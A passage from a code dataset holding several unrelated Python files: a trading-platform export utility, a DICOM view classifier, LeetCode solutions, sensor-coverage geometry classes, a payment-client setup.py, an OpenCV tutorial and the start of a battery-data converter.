in (s for s in state_names if s not in ('Ready', 'Error')):\n sc.CreateState(state_name)\n sc.Commit()\n states = sc.StatesByName()\n\n # Link states based on transitions, creating events as required\n for state_name, transitions in definition.items():\n state = states.At(state_name)\n for event_name, to_state_name in transitions.items():\n event = acm.FStateChartEvent(event_name)\n to_state = states.At(to_state_name)\n state.CreateTransition(event, to_state)\n sc.Commit()\n\n if layout:\n sc.Layout().Text(layout)\n sc.Commit()\n logger.info('Successfully created state chart \"{0}\"'.format(sc.Name()))\n return sc\t\n\t\ndef CreateStandardExportStateChart(name):\n exportEventId = StandardExportEventId()\n limit = 'Single'\n layout = 'Awaiting Confirmation,280,-76;Cancel,469,133;Corrected,280,59;Ready,91,-71;Cancel Sent,466,-70;Sent,92,139;'\n definition = {\n 'Ready': {exportEventId: 'Sent'},\n 'Sent': {'Void Trade': 'Cancel',\n 'Correct Trade': 'Awaiting Confirmation'},\n 'Awaiting Confirmation': {'Correction Confirmed': 'Corrected',\n 'Void Trade': 'Cancel'},\n 'Corrected': {exportEventId: 'Sent',\n 'Void Trade': 'Cancel'},\n 'Cancel': {exportEventId: 'Cancel Sent'},\n }\n return CreateStateChart(name, definition, layout, limit)\n\ndef CreateInstrumentExportStateChart_adv(name):\n exportEventId = StandardExportEventId()\n limit = 'Single'\n layout = 'Amended,280,-76;Cancel,469,133;Ready,91,-71;Cancel Sent,466,-70;Sent,92,139;'\n definition = {\n 'Ready': {exportEventId: 'Sent'},\n 'Sent': {'Void Instrument': 'Cancel',\n 'Inst. Amended': 'Amended'},\n 'Amended': {exportEventId: 'Sent'},\n 'Cancel': {exportEventId: 'Cancel Sent'},\n }\n return CreateStateChart(name, definition, layout, limit)\t\n\t\ndef CreateInstrumentExportStateChart(name):\n exportEventId = StandardExportEventId()\n limit = 'Single'\n layout = 'Awaiting Confirmation,280,-76;Cancel,469,133;Corrected,280,59;Ready,91,-71;Cancel Sent,466,-70;Sent,92,139;'\n definition = {\n 'Ready': {exportEventId: 'Sent'},\n }\n return CreateStateChart(name, definition, layout, limit)\n\ndef TradeFilterQueriesForIntegration(tradeQueryPrefix):\n integrationQueries = list()\n allQueries = acm.FStoredASQLQuery.Select(\"\")\n for storedQuery in allQueries:\n if storedQuery.Name().startswith(tradeQueryPrefix) and storedQuery.User() == None and storedQuery.Query().QueryClass() == acm.FTrade:\n integrationQueries.append(storedQuery)\n return integrationQueries\n\ndef FindMatchingQueryId(subject, ACMQueryIdList):\n \"\"\"\n first query satisfying the subject type is picked\n Need to see if and for which query (often represents product type) the subject fits\n \"\"\"\n if ACMQueryIdList:\n if type(ACMQueryIdList) == type(''):\n ACMQueryId = ACMQueryIdList\n else:\n ACMQueryId = ACMQueryIdList[0]\n #for ACMQueryId in ACMQueryIdList:\n ACMQuery = acm.FStoredASQLQuery[str(ACMQueryId)]\n assert ACMQuery, \"No ACM query with name %s\" % ACMQueryId\n qClass = ACMQuery.Query().QueryClass()\n #assert subject.IsKindOf(qClass), \"Query '%s' is for %s, but the subject is %s\" % (ACMQuery.Name(), qClass.Name(), subject.Class().Name())\n if ACMQuery.Query().IsSatisfiedBy(subject):\n return ACMQueryId\n return None\n\ndef RevertBusinessProcessesInErrorState(stateChartId):\n for bp in acm.BusinessProcess.FindByStateChart(acm.FStateChart[stateChartId]):\n if bp.CurrentStep().State().Name() == 'Error':\n try:\n bp.HandleEvent('Revert', notes=['Retry failed export'])\n bp.Commit()\n except RuntimeError as err:\n pass\n\n\nclass ExportTestMode(object):\n\n MODES = ('Disabled',\n 'Disabled - Do NOT transfer export file(s)',\n 'Enabled - Transfer export file(s)',\n 'Enabled - Do NOT transfer export file(s)')\n DEFAULT_MODE = 'Disabled'\n\n def __init__(self, mode=DEFAULT_MODE):\n if mode not in self.MODES:\n raise ValueError('Invalid export test mode \"' + str(mode) + '\"')\n self._mode = mode\n\n def __str__(self):\n return self.Mode()\n\n def IsEnabled(self):\n return (self.Mode() == 'Enabled - Transfer export file(s)' or self.Mode() == 'Enabled - Do NOT transfer export file(s)')\n\n def IsFileTransferEnabled(self):\n return (self.Mode() == 'Enabled - Transfer export file(s)' or self.Mode() == 'Disabled')\n\n def Mode(self):\n return self._mode\n\n\nclass ExportParty(object):\n broker = 'Broker'\n acquirer = 'Acquirer'\n counterparty = 'Counterparty'\n\n exts = acm.GetDefaultContext().GetAllExtensions('FColumnDefinition', 'trade_Broker')\n if len(exts) != 0:\n if exts[0].Value().GetString('ColumnName') != '':\n broker = exts[0].Value().GetString('ColumnName')\n if exts[0].Value().GetString('LabelList') != '':\n broker = exts[0].Value().GetString('LabelList').split(';')[0]\n exts = acm.GetDefaultContext().GetAllExtensions('FColumnDefinition', 'trade_acquirer_ptynbr')\n if len(exts) != 0:\n if exts[0].Value().GetString('ColumnName') != '':\n acquirer = exts[0].Value().GetString('ColumnName')\n if exts[0].Value().GetString('LabelList') != '':\n acquirer = exts[0].Value().GetString('LabelList').split(';')[0]\n exts = acm.GetDefaultContext().GetAllExtensions('FColumnDefinition', 'trade_counterparty_ptynbr')\n if len(exts) != 0:\n if exts[0].Value().GetString('ColumnName') != '':\n counterparty = exts[0].Value().GetString('ColumnName')\n if exts[0].Value().GetString('LabelList') != '':\n counterparty = exts[0].Value().GetString('LabelList').split(';')[0]\n\n MODES = (broker,\n acquirer,\n counterparty)\n DEFAULT_MODE = broker\n\n def __init__(self, mode=DEFAULT_MODE):\n if mode not in self.MODES:\n raise ValueError('Invalid party \"' + str(mode) + '\"')\n self._mode = mode\n\n def __str__(self):\n return self.Mode()\n\n def Mode(self):\n return self._mode\n\n def GetPartyObj(self, trade):\n if self._mode in self.MODES:\n if self._mode == self.MODES[0]:\n return trade.Broker()\n elif self._mode == self.MODES[1]:\n return trade.Acquirer()\n elif self._mode == self.MODES[2]:\n return trade.Counterparty()\n \n \n \ndef ExportBusinessProcess(trade, stateChart):\n collection = acm.BusinessProcess().FindBySubjectAndStateChart(trade, stateChart)\n if collection:\n return collection[0]\n\ndef ExportBusinessProcessStates(businessProcess):\n if businessProcess:\n currentStep = businessProcess.CurrentStep()\n currentStepName = str(currentStep.State().Name())\n previousStep = currentStep.PreviousStep()\n previousStepName = 'None'\n if previousStep:\n previousStepName = str(previousStep.State().Name())\n return (previousStepName, currentStepName)\n return ('None', 'None')\n\n\ndef import_custom_integration_module(prepack_name):\n if not prepack_name:\n return None\n\n import importlib\n module_suffix = 'CustomIntegration'\n try:\n prepack_module = acm.GetDefaultContext().GetModule(prepack_name)\n python_files = prepack_module.GetAllExtensions('FPythonCode')\n custom_integration_files = [python_file for python_file in python_files\n if module_suffix in python_file.Name().Text()]\n if custom_integration_files:\n if len(custom_integration_files) > 1:\n logger.error(\"More than one Custom Integration Python module found.\")\n return None\n\n return importlib.import_module(custom_integration_files[0].Name().Text())\n\n else:\n logger.error(\"Couldn't find Custom Integration Python module\")\n return None\n\n except Exception as e:\n logger.error('Error while importing Custom Integration Python module. ' + str(e.message))\n return None\n\n\ndef create_add_info_spec(type, add_info_list):\n DATA_TYPE_ENUM = list(acm.FEnumeration['enum(B92StandardType)'].Values())\n for i in add_info_list:\n add_info_spec = acm.FAdditionalInfoSpec[i]\n if not add_info_spec:\n add_info_spec = acm.FAdditionalInfoSpec()\n add_info_spec.RecType(type)\n add_info_spec.DataTypeType(DATA_TYPE_ENUM.index('String'))\n add_info_spec.Name(i)\n add_info_spec.Description(i)\n add_info_spec.Commit()\n\n\ndef create_add_info(type, i):\n DATA_TYPE_ENUM = list(acm.FEnumeration['enum(B92StandardType)'].Values())\n add_info_spec = acm.FAdditionalInfoSpec[i]\n if not add_info_spec:\n add_info_spec = acm.FAdditionalInfoSpec()\n add_info_spec.RecType(type)\n add_info_spec.DataTypeType(DATA_TYPE_ENUM.index('String'))\n add_info_spec.Name(i)\n add_info_spec.Description(i)\n add_info_spec.Commit()\n logger.info('Additional Info Specification {} for record type {} created successfully.'.format(i, type))\n else:\n logger.warn('Additional Info Specification {} for record type {} already exists.'.format(i, type))\n\n\ndef check_parameter(param):\n aliases_types = [alias.Name() for alias in acm.FInstrAliasType.Select('')]\n addinfos_types = [addinfo.Name() for addinfo in acm.FAdditionalInfoSpec.Select(\"recType='Instrument'\")]\n if param.Text() in aliases_types:\n return 'Alias'\n elif param.Text() in addinfos_types:\n return 'AdditionalInfo'\n elif isAttribute(acm.FInstrument, param):\n return 'Attribute'\n else:\n return None\n\n\ndef isAttribute(acmObj, attributes):\n if \":\" not in attributes:#not alias and not addinfo\n attr = attributes.Text().split(\".\", 1)\n if len(attr) == 2:\n try:\n return isAttribute(acmObj.GetMethod(attr[0], 0).ValueDomain(), attr[1])\n except Exception as e:\n return False\n else:\n return acmObj.GetMethod(attr[0], 0) is not None \n\n\ndef get_parameters(parameters_file):\n settings = acm.FDictionary()\n parameters = acm.GetDefaultContext().GetExtension('FParameters', 'FObject', parameters_file)\n if parameters:\n settings.AddAll(parameters.Value())\n return settings\n\n\ndef InitialiseParameters():\n parameters = get_parameters(\"InstIdentifiers\")\n \n paramTypes = acm.FDictionary()\n\n for p in parameters:\n parType = check_parameter(parameters[p])\n if parType:\n paramTypes[p] = acm.FDictionary()\n paramTypes[p][parameters[p]] = parType\n \n return paramTypes\n \ndef FindInsIdentifiers(ins, paramTypes):\n dict = acm.FOrderedDictionary()\n for iden in paramTypes:\n for value in paramTypes[iden]:\n idenValue = FindID(ins, value.Text(), paramTypes[iden][value])\n if idenValue:\n dict[iden]= idenValue\n return dict\n\ndef FindID(inst, IdName, IdType):\n if IdType == 'Alias':\n ident = inst.Alias(IdName)\n elif IdType == 'AdditionalInfo':\n ident = inst.add_info(IdName) \n elif IdType == 'Attribute':\n ident = getattr(inst, IdName)()\n else:\n ident = None\n return ident","sub_path":"Extensions/BD Export/FPythonCode/FExportUtils.py","file_name":"FExportUtils.py","file_ext":"py","file_size_in_byte":13567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"286671489","text":"# This file is an enhanced version of main.py that uses OOPS\r\n\r\n# Constant values\r\nDEVICE_OPTIONS = {'1': 'LAPTOP', '2': 'ANDROID', '3': 'IOS'}\r\nJOB_OPTIONS = {'1': 'Student', '2': 'Software Developer', '3': 'Business Person', '4': 'Data Scientist','5': 'Common person (Beginner knowledge of Tech)'}\r\nSCHOOL_OPTIONS = {\r\n '1': 'Primary', '2': 'Junior School', '3': 'Middle School', '4': 'Junior High School', '5': 'Senior High School'}\r\nSDE_OPTIONS = {'1': 'SDE 1', '2' : 'SDE 2', '3': 'SDE 3'}\r\nBUSINESS_OPTIONS = {'1': 'Manufacturing', '2': 'Service', '3': 'Merchandising', '4': 'Hybrid'}\r\nDEVICES = 3\r\nJOBS = 5\r\nSCHOOLS = 5\r\nSOFTWARE_DEVELOPERS = 3\r\n\r\n# Main Device Selection class\r\nclass DeviceSelector:\r\n def __init__(self, deviceType, profession):\r\n self.deviceType = deviceType\r\n self.profession = profession\r\n \r\n def success_msg(self):\r\n print(\"{} has been selected.\".format(self.deviceType))\r\n print(\"User is a {}\".format(self.profession))\r\n return self.profession\r\n\r\nclass Input():\r\n def __init__(self):\r\n #self.seq = 0\r\n self.deviceInput = int(input(\"What type of device do you want? \\n Choose one from the following: \\n 1. LAPTOP \\n 2. ANDROID \\\r\n \\n 3. IOS \\n Type numbers for selecting the option.\\n\"))\r\n self.deviceInput = self.input_device(self.deviceInput, DEVICES)\r\n self.device = DEVICE_OPTIONS.get(str(self.deviceInput))\r\n self.professionInput = int(input(\"What is your profession? \\n Choose one from the following: \\n 1. Student \\n 2. Software Developer \\n 3. Business Person \\\r\n \\n 4. Data Scientist \\n 5. Common person (Beginner knowledge of Tech) \\nType number of option.\\n\"))\r\n self.professionInput = self.input_profession(self.professionInput, JOBS)\r\n self.profession = JOB_OPTIONS.get(str(self.professionInput))\r\n self.professionSubType = self.input_professionType(self.profession)\r\n\r\n def input_device (self, deviceInput, DEVICES):\r\n #self.seq = 1\r\n if deviceInput > DEVICES or deviceInput <= 0:\r\n print(\"Choice not found. You would have to retry.\")\r\n deviceInput = int(input(\"What type of device do you want? \\n Choose one from the following: \\n 1. LAPTOP \\n 2. ANDROID \\\r\n \\n 3. IOS \\n Type numbers for selecting the option.\\n\"))\r\n deviceInput = self.input_device(deviceInput, DEVICES)\r\n return deviceInput\r\n\r\n def input_profession (self, professionInput, JOBS):\r\n #self.seq = 2\r\n if professionInput > JOBS or professionInput <= 0:\r\n print(\"Choice not found. You would have to retry.\")\r\n professionInput = int(input(\"What is your profession? \\n Choose one from the following: \\n 1. Student \\n 2. Software Developer \\n 3. Business Person \\\r\n \\n 4. Data Scientist \\n 5. Common person (Beginner knowledge of Tech) \\nType number of option.\\n\"))\r\n professionInput = self.input_profession(professionInput, JOBS)\r\n return professionInput\r\n\r\n def input_professionType (self, profession):\r\n #self.seq = 3\r\n if profession == 'Student':\r\n #studentType = \"\"\r\n professionSubType = int(input(\"What kind of school? \\n Choose one from the following: \\n 1. Primary/Pre-Primary (Pre-Nursery, Nursery, Kindergarten, Grade 1 & Grade 2) \\\r\n \\n 2. Junior School (Grade 3 to Grade 5)\\n 3. Middle School (Grade 6 to Grade 8) \\\r\n \\n 4. Junior High School (Grade 9 to Grade 10) \\n 5. Senior High School (Grade 11 to Grade 12) \\\r\n \\n Choose a number from the given options.\\n\"))\r\n if professionSubType > SCHOOLS or professionSubType <= 0:\r\n print(\"Choice not found. You would have to retry.\")\r\n professionSubType = self.input_professionType(self.profession)\r\n studentType = professionSubType\r\n return studentType\r\n else:\r\n studentType = SCHOOL_OPTIONS.get(str(professionSubType))\r\n return studentType\r\n \r\n if profession == 'Software Developer':\r\n professionSubType = int(input(\"Please mention the tier of of your Software Development. \\n Choose one from the following: \\n 1. Tier 1\\\r\n \\n 2. Tier 2 \\n 3. Tier 3 \\n Write number to select option.\"))\r\n if professionSubType > SOFTWARE_DEVELOPERS or professionSubType <= 0:\r\n print(\"Choice not found. You would have to retry.\")\r\n professionSubType = self.input_professionType(self.profession)\r\n SDEType = professionSubType\r\n return SDEType\r\n else:\r\n SDEType = SDE_OPTIONS.get(str(professionSubType))\r\n return SDEType\r\n \r\n def output (self):\r\n return(str(\"{} has been queried & the user is a {}\".format(self.device, self.profession)))\r\n\r\nobj = Input()\r\njob = obj.profession\r\ndeviceinp = obj.device\r\njobType = obj.professionSubType\r\nprint(job)\r\nprint(jobType)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"284693928","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 5 07:57:57 2018\n\n@author: Adrian\n\"\"\"\n\nimport os\nimport pydicom\nimport numpy as np\nimport gzip\nfrom skimage.transform import resize\nimport imageio\n\n\nfrom keras.models import Model, model_from_json, Sequential\nfrom keras.layers import TimeDistributed, Dense, SimpleRNN, Input, Flatten, Convolution2D, InputLayer, Reshape, Conv2D, MaxPooling2D, Dropout, BatchNormalization\nfrom keras.optimizers import Adam\n\ngoalpath=os.path.join(os.getcwd(), 'main_dir')\nmodel_path='View_Custom'\n\nif not os.path.isdir('train_data_RWMAv1'):\n os.makedirs('train_data_RWMA')\nsave_path=os.path.join(os.getcwd(), 'train_data_RWMA')\n\nANdirlist=os.listdir(goalpath)\n\n\ndef labeling(x='all', ANdirlist=ANdirlist):\n if x=='all': ANdirlist=ANdirlist[:]\n else: ANdirlist=ANdirlist[:int(x)]\n \n all_labels=[]\n for i, an in enumerate(ANdirlist):\n print('{}/{}'.format(i, len(ANdirlist)))\n savedirpath=os.path.join(save_path, an)\n if not os.path.isdir(savedirpath):\n os.makedirs(savedirpath)\n #print('made dir')\n savedirlist=os.listdir(savedirpath)\n if len(savedirlist)<4:\n labels=ANdir_labeling(an)\n\n all_labels.append(labels) \n \n return all_labels\n\ndef ANdir_labeling(an):\n\n an_path=os.path.join(goalpath, an)\n files=os.listdir(an_path)\n \n for i, dcm in enumerate(files):\n print('{} is being processing'.format(i))\n file_path=os.path.join(an_path, dcm)\n try: \n tar_array=preparefile(file_path)\n #print(tar_array.shape)\n print('Predicting', end='')\n label=model.predict(tar_array)\n print('.....Prediction done')\n\n except NotImplementedError: \n label=np.array([[0,0,0,0,0]])\n \n if i==0: labels=label\n else : labels=np.concatenate((labels, label))\n\n name_list=['LAX', 'SAX', '4ch', '2ch']\n for seq, i in enumerate(labels.argmax(axis=0)[:4]):\n file_path=os.path.join(an_path, files[i])\n tar_array=preparefile(file_path, a=768, b=1024)\n save_file_path=os.path.join(save_path, an, name_list[seq]+'.npy.gz')\n img_file_path=os.path.join(save_path, an, name_list[seq]+'.jpg')\n with gzip.GzipFile(save_file_path, \"w\") as gf:\n np.save(gf, tar_array)\n imageio.imwrite(img_file_path, tar_array[0][5])\n\n return labels\n\ndef get_array(path):\n ds=pydicom.read_file(path)\n dt=ds.pixel_array\n return dt\n\ndef regrid_vid(tar_array, a=600, b=800):\n for i, img in enumerate(tar_array):\n img=regrid(img, a=a, b=b)\n if i==0: tar_array_sub=img\n else : tar_array_sub=np.concatenate((tar_array_sub, img))\n return tar_array_sub\n\ndef regrid(img, a=600, b=800):\n img_resized=resize(img, (a,b))\n img_resized=np.expand_dims(img_resized, axis=0)\n return img_resized\n\ndef pad2fifty(tar_dcm):\n add_len=50-len(tar_dcm)\n add_array=np.zeros(shape=(add_len, tar_dcm.shape[1], tar_dcm.shape[2], tar_dcm.shape[3]))\n tar_dcm=np.concatenate((tar_dcm, add_array))\n return tar_dcm\n\ndef preparefile(file_path, a=600, b=800):\n tar_array=get_array(file_path)/255\n #print(tar_array.shape)\n if len(tar_array.shape) < 4: raise NotImplementedError\n if tar_array.shape[1:4] != (a, b, 3):\n tar_array=regrid_vid(tar_array, a, b)\n if len(tar_array)<50:\n tar_array=pad2fifty(tar_array) \n tar_array=tar_array[:50]\n tar_array=np.expand_dims(tar_array, axis=0)\n return tar_array\n\ndef model_loading(x):\n with open(str(x)+'_arch.json', 'r') as json_file:\n model_json=json_file.read()\n model=model_from_json(model_json)\n model.load_weights(str(x)+'_weights.h5')\n optimizer=Adam(lr=1e-4)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n print('model loaded')\n return model\n\n\nif __name__=='__main__':\n x=input('How many folders you wanna predict?\\n')\n model=model_loading(model_path)\n \n try:\n x=int(x)\n all_labels=labeling(x=x, ANdirlist=ANdirlist)\n except:\n all_labels=labeling()","sub_path":"predictViews_customV1.py","file_name":"predictViews_customV1.py","file_ext":"py","file_size_in_byte":4131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"502605190","text":"'''\n 994. 腐烂的橘子难度简单148在给定的网格中,每个单元格可以有以下三个值之一:\n\t值 0 代表空单元格;\n\t值 1 代表新鲜橘子;\n\t值 2 代表腐烂的橘子。\n每分钟,任何与腐烂的橘子(在 4 个正方向上)相邻的新鲜橘子都会腐烂。\n返回直到单元格中没有新鲜橘子为止所必须经过的最小分钟数。如果不可能,返回 -1。\n'''\n\n\nclass Solution(object):\n def orangesRotting_1(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n import collections\n R, C = len(grid), len(grid[0])\n\n # queue - all starting cells with rotting oranges\n queue = collections.deque()\n for r, row in enumerate(grid):\n for c, val in enumerate(row):\n if val == 2:\n queue.append((r, c, 0))\n\n def neighbors(r, c):\n for nr, nc in ((r - 1, c), (r, c - 1), (r + 1, c), (r, c + 1)):\n if 0 <= nr < R and 0 <= nc < C:\n yield nr, nc\n\n d = 0\n while queue:\n r, c, d = queue.popleft()\n for nr, nc in neighbors(r, c):\n if grid[nr][nc] == 1:\n grid[nr][nc] = 2\n queue.append((nr, nc, d + 1))\n\n if any(1 in row for row in grid):\n return -1\n return d\n\n # 广度优先-集合的方式实现\n # 执行用时 :44 ms, 在所有 Python 提交中击败了55.56%的用户\n # 内存消耗 :11.9 MB, 在所有 Python 提交中击败了8.00%的用户\n def orangesRotting_2(self, grid):\n row = len(grid)\n col = len(grid[0])\n rotten = {(i, j) for i in range(row) for j in range(col) if grid[i][j] == 2} # 腐烂集合\n fresh = {(i, j) for i in range(row) for j in range(col) if grid[i][j] == 1} # 新鲜集合\n time = 0\n print(rotten, fresh, sep=\" \")\n while fresh:\n if not rotten:\n return -1\n # 即将腐烂的如果在新鲜的集合中,就将它腐烂\n #####################################################\n '''drotten = set()\n for i, j in rotten:\n for di, dj in [(0, 1), (0, -1), (1, 0), (-1, 0)]:\n if (i + di, j + dj) in fresh:\n drotten.add((i + di, j + dj))\n rotten = drotten'''\n #####################################################\n # 等价于↓\n rotten = {(i + di, j + dj) for i, j in rotten for di, dj in [(0, 1), (0, -1), (1, 0), (-1, 0)] if\n (i + di, j + dj) in fresh}\n fresh -= rotten # 剔除腐烂的\n time += 1\n return time\n\n # 广度优先-队列的方式实现\n # 执行用时 :36 ms, 在所有 Python 提交中击败了88.14%的用户\n # 内存消耗 :11.7 MB, 在所有 Python 提交中击败了72.00%的用户\n def orangesRotting_3(self, grid):\n row, col, time = len(grid), len(grid[0]), 0\n directions = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n queue = []\n # add the rotten orange to the queue\n # for i in range(row):\n # for j in range(col):\n # if grid[i][j] == 2:\n # queue.append((i, j, time))\n queue = [(i, j, time) for i in range(row) for j in range(col) if grid[i][j] == 2]\n\n # bfs\n while queue:\n i, j, time = queue.pop(0) # 弹个腐烂橘子出来\n for di, dj in directions:\n # 搜索当前腐烂的橘子能够腐烂的其它橘子\n if 0 <= i + di < row and 0 <= j + dj < col and grid[i + di][j + dj] == 1:\n grid[i + di][j + dj] = 2 # 腐烂\n queue.append((i + di, j + dj, time + 1)) # 腐烂橘子入队列\n\n # if there are still fresh oranges, return -1\n for row in grid:\n if 1 in row:\n return -1\n return time\n\n\ns = Solution()\nprint(s.orangesRotting_3([[2, 1, 1], [1, 1, 0], [0, 1, 1]]))\n","sub_path":"leetcode/LC0017_994_orangesRotting.py","file_name":"LC0017_994_orangesRotting.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534471493","text":"import math\r\nimport graphics as gr\r\nfrom jdgeometry import Point, Circle, Line, Polygon\r\nimport random\r\nimport time\r\n\r\n#--[Class AreaOfInterest]------------------------------------------------------\r\n# Represents the Rectangular Area of Interest\r\nclass AreaOfInterest:\r\n \r\n ## Lines forming the border of the rectangular region\r\n ## l1 is the left boundary and rest following in clockwise direction\r\n l1 = None\r\n l2 = None\r\n l3 = None\r\n l4 = None\r\n rect = None\r\n diag = None\r\n \r\n def __init__(self,l1,l2,l3,l4):\r\n self.l1 = l1\r\n self.l2 = l2\r\n self.l3 = l3\r\n self.l4 = l4\r\n self.rect = Polygon(l1.p1, l2.p1, l3.p1, l4.p1)\r\n self.diag = l1.p1.distance(l2.p2)\r\n \r\n @classmethod\r\n def byDiagonal(cls,p1,p2):\r\n l1 = Line(p1, Point(p1.x, p2.y))\r\n l2 = Line(Point(p1.x,p2.y), p2)\r\n l3 = Line(p2, Point(p2.x, p1.y))\r\n l4 = Line(Point(p2.x,p1.y), p1)\r\n \r\n return cls(l1,l2,l3,l4)\r\n \r\n \r\n @classmethod\r\n def byLine(cls,l1, l2, l3, l4):\r\n return cls(l1,l2,l3,l4)\r\n \r\n \r\n#--[Class Sensor ]-------------------------------------------------------------\r\n## Represents a Sensor type\r\nclass Sensor:\r\n type = None\r\n range = None\r\n cost = None\r\n loc = None # Set of feasible locations\r\n curloc = None # index of the present location from the global list of locations\r\n\r\n \r\n def __init__(self, typ, rg, cost,locs,curloc):\r\n self.s_type = typ\r\n self.s_range = rg\r\n self.s_cost = cost\r\n self.s_loc = locs\r\n self.curloc = curloc\r\n \r\n\r\n#--[Class Sensor Location ]-------------------------------------------------------------\r\n## Represents a feasible location from the set of all feasible locations\r\n# This will be used to represent properties associated with the sensor location\r\n# like:-\r\n# (a) The sensor to which it belongs\r\n# (b) List of sensors whose sensing range overlaps the perimeter of the sensor\r\n# located at this location\r\n#\r\n# This class will be helpful to find perimeter overlaps by other sensors\r\nclass SensorLocation:\r\n \r\n def __init__ (self, point, sensor):\r\n \r\n self.point = point # The coordinate of the location\r\n self.sensor = sensor # The sensor to which it belongs\r\n \r\n # List of sensors whose sensing range overlaps the perimeter of the \r\n # sensor located at this location\r\n # Tuple: (thisSensorCenter, \r\n # overlapping_sensor_object, \r\n # startAngleOfOverlap, \r\n # endAngleOfOverlap, \r\n # extent, \r\n # distanceBetweenSensors )\r\n self.overlappingSensors = [] \r\n \r\n ## Adds a sensor to the list of overlapping sensors\r\n # @param sensorCenter: The center Point of the overlapping sensor\r\n # @param sensor: The object of the sensor class which is being added(i.e which is overalapping)\r\n # @param startAngle: The angle in degrees (measured anti-clockwise) at which the overlap starts with the perimeter of the sensor located at this location\r\n # @param endAngle: The angle in degrees (anti-clockwise) at which the overlap ends\r\n # @param extent: The extent of the overlap in degrees\r\n # @param distance: The eucildian distance between the centres of the overlapping sensor and this location\r\n def addOverlappingSensor(self,sensorCenter, sensor,startAngle, endAngle, extent, distance):\r\n\r\n \r\n normal = False\r\n if startAngle < 0:\r\n e1 = 2*math.pi + startAngle\r\n self.overlappingSensors.append((sensorCenter, sensor, e1, 2*math.pi, e1, distance) )\r\n self.overlappingSensors.append((sensorCenter, sensor, 0, endAngle, extent - e1, distance) )\r\n normal = False\r\n else:\r\n normal = True\r\n \r\n if endAngle > 2 * math.pi:\r\n e1 = 2*math.pi - startAngle\r\n self.overlappingSensors.append((sensorCenter, sensor, startAngle, 2*math.pi, e1, distance) )\r\n self.overlappingSensors.append((sensorCenter, sensor, 0, (endAngle - 2*math.pi), extent - e1, distance) )\r\n normal = False\r\n else:\r\n normal = True\r\n \r\n if normal == True:\r\n self.overlappingSensors.append((sensorCenter, sensor, startAngle, endAngle, extent, distance) )\r\n\r\n# Class to represent the circles which cover a portion of the perimeter of \r\nclass CoveringCircle:\r\n def __init__(self, center, radius, s_ang, ext_ang, dist):\r\n self.center = center\r\n self.radius = radius\r\n self.s_angle = s_ang\r\n self.extent = ext_ang\r\n self.dist = dist","sub_path":"MTP/Sensors/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336493117","text":"import os\nfrom setuptools import setup\n\ncielo = __import__('cielo', {}, {}, [''])\n\ndef read_file(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name = \"pycielo\",\n version = cielo.__version__,\n author = \"Dado\",\n author_email = \"vinicius.cainelli@dado.ppg.br\",\n description = (\"cielo python client\"),\n license = \"MIT\",\n keywords = \"cielo\",\n url = \"https://github.com/viniciuscainelli/pycielo\",\n packages=['cielo',],\n long_description=read_file('README.textile'),\n classifiers=[\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n install_requires=['requests >= 0.10',],\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"572076265","text":"# @Time : 2019/6/29 8:08\n# @Author : Xu Huipeng\n# @Blog : https://brycexxx.github.io/\n\nfrom typing import List\n\n\nclass Solution:\n def findMin(self, nums: List[int]) -> int:\n low, high = 0, len(nums) - 1\n while low < high:\n mid = low + ((high - low) >> 1)\n while low < high and nums[low] == nums[mid] == nums[high]:\n low += 1\n high -= 1\n if nums[mid] > nums[high]:\n low = mid + 1\n else:\n high = mid\n return nums[low]\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.findMin([2, 2, 2, 0, 1]))\n","sub_path":"findMinTwo.py","file_name":"findMinTwo.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"86870643","text":"#!/usr/bin/env python\nimport numpy as np\nimport cv2\n\n# Load an color image in grayscale\ncv2.namedWindow('image', cv2.WINDOW_NORMAL)\nimg = cv2.imread('messi.jpg',0)\n#size(img) \ncv2.imshow('image',img)\ncv2.imwrite('messigray.png',img)\ncv2.waitKey(0)\ncv2.destroyWindow('image')\n\n","sub_path":"opencv/examples/getting_started/images/tutorial1.py","file_name":"tutorial1.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"387074997","text":"'''\nmat - csv converter for NASA Ames Prognostics Center of Excellence (PCoE),\nLi-ion Battery Aging Datasets.\nDataset available on 'https://c3.nasa.gov/dashlink/resources/133/'\nRef: https://github.com/fmardero/battery_aging\nAuthor: Hyunho Mo\nDate: 19/11/2020\n\n'''\n\nimport pandas as pd\nimport argparse\nfrom scipy.io import loadmat\n\n\nmat_data_folder = 'pcoe/'\nbattery_idx = 'B0018'\nmat_data = loadmat(mat_data_folder + 'B0018.mat')[battery_idx]\n# mat_data = loadmat(mat_data_folder + 'B0005.mat')['B0005']\n# print (type(mat_data))\n# print(mat_data.keys())\n\n\ndef to_df(mat_db):\n \"\"\"Returns one pd.DataFrame per cycle type\"\"\"\n\n # Features common for every cycle\n cycles_cols = ['type', 'ambient_temperature', 'time']\n\n # Features monitored during the cycle\n features_cols = {\n 'charge': ['Voltage_measured', 'Current_measured', 'Temperature_measured',\n 'Current_charge', 'Voltage_charge', 'Time'],\n 'discharge': ['Voltage_measured', 'Current_measured', 'Temperature_measured',\n 'Current_charge', 